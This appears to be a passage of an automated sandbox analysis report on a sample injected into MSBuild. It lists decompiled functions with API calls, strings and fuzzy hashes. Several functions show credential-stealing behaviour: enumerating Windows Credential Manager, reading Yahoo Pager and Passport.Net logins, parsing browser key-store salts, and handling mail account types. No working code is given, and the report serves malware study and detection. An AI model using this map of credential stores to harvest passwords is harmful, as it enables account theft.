Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042B9AD

Strings

a GROUP BY clause is required before HAVING, xrefs: 0042BC5A
ORDER, xrefs: 0042BBA3
GROUP, xrefs: 0042BBD3
H, xrefs: 0042BAAE
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042BC6E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-3608744896
Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A

Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E

Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8

Strings

NOCASE, xrefs: 00442AE9
RTRIM, xrefs: 00442AFD
main, xrefs: 00442BFF
temp, xrefs: 00442C0F
BINARY, xrefs: 00442AB0, 00442AB5, 00442AC5, 00442AD5, 00442B1B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcmpmemcpy
String ID: BINARY$NOCASE$RTRIM$main$temp
API String ID: 1784268899-4153596280
Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99

Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
memset.MSVCRT ref: 00410246
memset.MSVCRT ref: 00410258

Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2

memset.MSVCRT ref: 0041033F
_mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_mbscpy$CloseHandleOpenProcess
String ID:
API String ID: 3974772901-0
Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69

Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0044406C
??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E

Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426

strlen.MSVCRT ref: 004440D1

Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516

memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
String ID:
API String ID: 577244452-0
Opcode ID: c86c0595bc932ff72a168c8a86fe748196c055b0d077d0074bf27620d53ce65a
Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
Opcode Fuzzy Hash: c86c0595bc932ff72a168c8a86fe748196c055b0d077d0074bf27620d53ce65a
Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58

Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

_strcmpi.MSVCRT ref: 00404518
_strcmpi.MSVCRT ref: 00404536

Strings

imap, xrefs: 00404530
pop3, xrefs: 00404512
smtp, xrefs: 0040454D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi$memcpystrlen
String ID: imap$pop3$smtp
API String ID: 2025310588-821077329
Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88

Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C02D

Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE

Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F

Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743

Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550

Strings

*.htm;*.html, xrefs: 0040C073
*.xml, xrefs: 0040C09C
*.txt, xrefs: 0040C046
txt, xrefs: 0040C0DD, 0040C0E0
*.csv, xrefs: 0040C0A8

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2726666094-3614832568
Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99

Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403A88
memset.MSVCRT ref: 00403AA1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
strlen.MSVCRT ref: 00403AE9
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidememset$FileWritestrlen
String ID:
API String ID: 1786725549-0
Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78

Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
OpenClipboard.USER32(?), ref: 0040C1B1
GetLastError.KERNEL32 ref: 0040C1CA
DeleteFileA.KERNEL32(00000000), ref: 0040C1E7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
String ID:
API String ID: 2014771361-0
Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68

Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151

Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1

memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1

Strings

global-salt, xrefs: 0040619C
password-check, xrefs: 00406174

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcmp$memcpy
String ID: global-salt$password-check
API String ID: 231171946-3927197501
Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D

Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE

Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004016A3
GetSystemMetrics.USER32(00000015), ref: 004016B1
GetSystemMetrics.USER32(00000014), ref: 004016BD
BeginPaint.USER32(?,?), ref: 004016D7
DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
EndPaint.USER32(?,?), ref: 004016F3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50

Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040644F
memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475

Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E

memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E

Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5

Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0044495F
memset.MSVCRT ref: 00444978
memset.MSVCRT ref: 0044498C

Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F

strlen.MSVCRT ref: 004449A8
memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3

Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296

Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319

memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23

Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272

Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset$strlen
String ID:
API String ID: 2142929671-0
Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94

Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA

Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631

Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
strlen.MSVCRT ref: 0040F7BE
_mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC

Strings

Passport.Net\*, xrefs: 0040F724

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
String ID: Passport.Net\*
API String ID: 2329438634-3671122194
Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B

memset.MSVCRT ref: 0040330B
GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
strchr.MSVCRT ref: 0040335A

Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D

strlen.MSVCRT ref: 0040339C

Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9

Strings

Personalities, xrefs: 00403320

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
String ID: Personalities
API String ID: 2103853322-4287407858
Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D

Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00444573

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF

Strings

EOptions string, xrefs: 004445B2
Yahoo! User ID, xrefs: 00444597
Software\Yahoo\Pager, xrefs: 0044457C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CloseOpenQueryValuememset
String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
API String ID: 1830152886-1703613266
Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698

Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00406D87
sprintf.MSVCRT ref: 00406DAF
MessageBoxA.USER32(?,?,Error,00000030), ref: 00406DC8

Strings

Error, xrefs: 00406DB9
Error %d: %s, xrefs: 00406DA9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98

Function 00410F99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,75C08FB0,00405EC6,00000000), ref: 00410FA2
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
FreeLibrary.KERNEL32(00000000), ref: 00410FC8

Strings

shlwapi.dll, xrefs: 00410F9B
SHAutoComplete, xrefs: 00410FAA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
Instruction Fuzzy Hash: F9D05B3E3026106BB6615B366C89EAFAAD5DFCA75271D0031F940E2150CB644C438D69

Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043DFC5
memset.MSVCRT ref: 0043DFFE
memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C

Strings

no query solution, xrefs: 0043E318
, xrefs: 0043E2E6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$memcpy
String ID: $no query solution
API String ID: 368790112-326442043
Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58

Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?), ref: 00430AF9
memcpy.MSVCRT(?,?,00000000), ref: 00430B6A

Strings

